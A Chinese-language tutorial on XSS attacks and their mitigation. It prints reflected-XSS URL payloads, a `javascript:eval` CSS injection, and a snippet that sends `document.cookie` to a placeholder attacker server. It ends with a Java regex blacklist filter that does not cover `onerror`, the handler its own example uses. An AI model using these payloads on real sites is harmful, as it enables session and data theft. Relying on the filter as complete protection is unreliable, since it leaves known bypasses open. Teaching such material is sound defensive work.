淺談XSS攻擊原理與解決方法
一、概述
XSS攻擊是Web攻擊中最常見的攻擊方法之一,它是通過對網頁注入可執行程式碼且成功地被瀏覽器 執行,達到攻擊的目的,形成了一次有效XSS攻擊。一旦攻擊成功,它可以獲取使用者的聯絡人列表,然後向聯絡人傳送虛假詐騙資訊,可以刪除使用者的日誌等等,有時候還和其他攻擊方式同時實施比如SQL注入攻擊伺服器和資料庫、Click劫持、相對連結劫持等實施釣魚,它帶來的危害是巨 大的,是web安全的頭號大敵。
二、攻擊的條件
實施XSS攻擊需要具備兩個條件:
一、需要向web頁面注入惡意程式碼;
二、這些惡意程式碼能夠被瀏覽器成功的執行。
看一下下面這個例子:
<div id="el" style="background:url('javascript:eval(document.getElementById("el").getAttribute("code")) ')" code="var a = document.createElement('a'); a.innerHTML= '執行了惡意程式碼';document.body.appendChild(a); //這這裡執行程式碼 "></div>
這段程式碼在舊版的IE8和IE8以下的版本都是可以被執行的,火狐也能執行程式碼,但火狐對其禁止訪問DOM物件,所以在火狐下執行將會看到控制裡丟擲異常:document is not defined (document是沒有定義的)
再來看一下面這段程式碼:
<div> <img src="/images/handler.ashx?id=<%= Request.QueryString["id"] %>" /> </div>
相信很多程式設計師都覺得這個程式碼很正常,其實這個程式碼就存在一個反射型的XSS攻擊,假如輸入下面的地址:
http://www.xxx.com/?id=" /><script>alert(/xss/)</script><br x=" 最終反射出來的HTML程式碼: <div> <img src="/images/handler.ashx?id=" /><script>alert(/xss/)</script><br x="" /> </div>
也許您會覺得把ValidateRequest設定為true或者保持預設值就能高枕無憂了,其實這種情況還可以輸入下面的地址達到相同的攻擊效果:
http://www.xxx.com/?id=xx" onerror="this.onload()" onload="alert(/xss/)" x="
三、根據XSS攻擊的效果可以分為幾種型別
1、XSS反射型攻擊:惡意程式碼並沒有儲存在目標網站,通過引誘使用者點選一個連結到目標網站的惡意連結來實施攻擊的。
2、XSS儲存型攻擊:惡意程式碼被儲存到目標網站的伺服器中,這種攻擊具有較強的穩定性和永續性,比較常見場景是在部落格,論壇等社交網站上,但OA系統,和CRM系統上也能看到它身影,比如:某CRM系統的客戶投訴功能上存在XSS儲存型漏洞,黑客提交了惡意攻擊程式碼,當系統管理員檢視投訴資訊時惡意程式碼執行,竊取了客戶的資料,然而管理員毫不知情,這就是典型的XSS儲存型攻擊。
四、XSS攻擊能做些什麼
1、竊取cookies,讀取目標網站的cookie傳送到黑客的伺服器上,如下面的程式碼:
var i=document.createElement("img"); document.body.appendChild(i); i.src = "http://www.hackerserver.com/?c=" + document.cookie;
2、讀取使用者未公開的資料,如果:郵件列表或者內容、系統的客戶資料,聯絡人列表等等,如程式碼。
五、解決方法
1、一種方法是在表單提交或者url引數傳遞前,對需要的引數進行過濾。請看如下XSS過濾工具類程式碼
在專案的web.xml配置過濾器:
<filter> <filter-name>XssEscape</filter-name> <filter-class>XssFilter</filter-class> </filter> <filter-mapping> <filter-name>XssEscape</filter-name> <url-pattern>/*</url-pattern> </filter-mapping>
XssFilter實現:
public class XssFilter implements Filter { @Override public void init(FilterConfig filterConfig) throws ServletException { } @Override public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { chain.doFilter(new XssHttpServletRequestWrapper((HttpServletRequest) request), response); } @Override public void destroy() { } }
XssHttpServletRequestWrapper實現:
public class XssHttpServletRequestWrapper extends HttpServletRequestWrapper { public XssHttpServletRequestWrapper(HttpServletRequest request) { super(request); } @SuppressWarnings("rawtypes") public Map<String,String[]> getParameterMap(){ Map<String,String[]> request_map = super.getParameterMap(); Iterator iterator = request_map.entrySet().iterator(); while(iterator.hasNext()){ Map.Entry me = (Map.Entry)iterator.next(); String[] values = (String[])me.getValue(); for(int i = 0 ; i < values.length ; i++){ values[i] = xssClean(values[i]); } } return request_map; } public String[] getParameterValues(String paramString) { String[] arrayOfString1 = super.getParameterValues(paramString); if (arrayOfString1 == null) return null; int i = arrayOfString1.length; String[] arrayOfString2 = new String[i]; for (int j = 0; j < i; j++){ arrayOfString2[j] = xssClean(arrayOfString1[j]); } return arrayOfString2; } public String getParameter(String paramString) { String str = super.getParameter(paramString); if (str == null) return null; return xssClean(str); } public String getHeader(String paramString) { String str = super.getHeader(paramString); if (str == null) return null; str = str.replaceAll("\r|\n", ""); return xssClean(str); } private String xssClean(String value) { //ClassLoaderUtils.getResourceAsStream("classpath:antisamy-slashdot.xml", XssHttpServletRequestWrapper.class) if (value != null) { // NOTE: It's highly recommended to use the ESAPI library and // uncomment the following line to // avoid encoded attacks. // value = encoder.canonicalize(value); value = value.replaceAll("\0", ""); // Avoid anything between script tags Pattern scriptPattern = Pattern.compile("<script>(.*?)</script>", Pattern.CASE_INSENSITIVE); value = scriptPattern.matcher(value).replaceAll(""); // Avoid anything in a src='...' type of expression scriptPattern = Pattern.compile("src[\r\n]*=[\r\n]*\\\'(.*?)\\\'", Pattern.CASE_INSENSITIVE | Pattern.MULTILINE | Pattern.DOTALL); value = scriptPattern.matcher(value).replaceAll(""); // Avoid anything in a href='...' type of expression scriptPattern = Pattern.compile("href[\r\n]*=[\r\n]*\\\"(.*?)\\\"", Pattern.CASE_INSENSITIVE | Pattern.MULTILINE | Pattern.DOTALL); value = scriptPattern.matcher(value).replaceAll(""); // Remove any lonesome </script> tag scriptPattern = Pattern.compile("</script>", Pattern.CASE_INSENSITIVE); value = scriptPattern.matcher(value).replaceAll(""); // Remove any lonesome <script ...> tag scriptPattern = Pattern.compile("<script(.*?)>", Pattern.CASE_INSENSITIVE | Pattern.MULTILINE | Pattern.DOTALL); value = scriptPattern.matcher(value).replaceAll(""); // Avoid eval(...) expressions scriptPattern = Pattern.compile("eval\\((.*?)\\)", Pattern.CASE_INSENSITIVE | Pattern.MULTILINE | Pattern.DOTALL); value = scriptPattern.matcher(value).replaceAll(""); // Avoid expression(...) expressions scriptPattern = Pattern.compile("expression\\((.*?)\\)", Pattern.CASE_INSENSITIVE | Pattern.MULTILINE | Pattern.DOTALL); value = scriptPattern.matcher(value).replaceAll(""); // Avoid javascript:... expressions scriptPattern = Pattern.compile("javascript:", Pattern.CASE_INSENSITIVE); value = scriptPattern.matcher(value).replaceAll(""); // Avoid vbscript:... expressions scriptPattern = Pattern.compile("vbscript:", Pattern.CASE_INSENSITIVE); value = scriptPattern.matcher(value).replaceAll(""); // Avoid onload= expressions scriptPattern = Pattern.compile("onload(.*?)=", Pattern.CASE_INSENSITIVE | Pattern.MULTILINE | Pattern.DOTALL); value = scriptPattern.matcher(value).replaceAll(""); } return value; } }
二、 過濾使用者輸入的 檢查使用者輸入的內容中是否有非法內容。如<>(尖括號)、”(引號)、 ‘(單引號)、%(百分比符號)、;(分號)、()(括號)、&(& 符號)、+(加號)等,嚴格控制輸出。
可以利用下面這些函式對出現xss漏洞的引數進行過濾
1、htmlspecialchars() 函式,用於轉義處理在頁面上顯示的文字。
2、htmlentities() 函式,用於轉義處理在頁面上顯示的文字。
3、strip_tags() 函式,過濾掉輸入、輸出裡面的惡意標籤。
4、header() 函式,使用header("Content-type:application/json"); 用於控制 json 資料的頭部,不用於瀏覽。
5、urlencode() 函式,用於輸出處理字元型引數帶入頁面連結中。
6、intval() 函式用於處理數值型引數輸出頁面中。
7、自定義函式,在大多情況下,要使用一些常用的 html 標籤,以美化頁面顯示,如留言、小紙條。那麼在這樣的情況下,要採用白名單的方法使用合法的標籤顯示,過濾掉非法的字元。
各語言示例:
PHP的htmlentities()或是htmlspecialchars()。
Python的cgi.escape()。
ASP的Server.HTMLEncode()。
ASP.NET的Server.HtmlEncode()或功能更強的Microsoft Anti-Cross Site Scripting Library
Java的xssprotect(Open Source Library)。
Node.js的node-validator。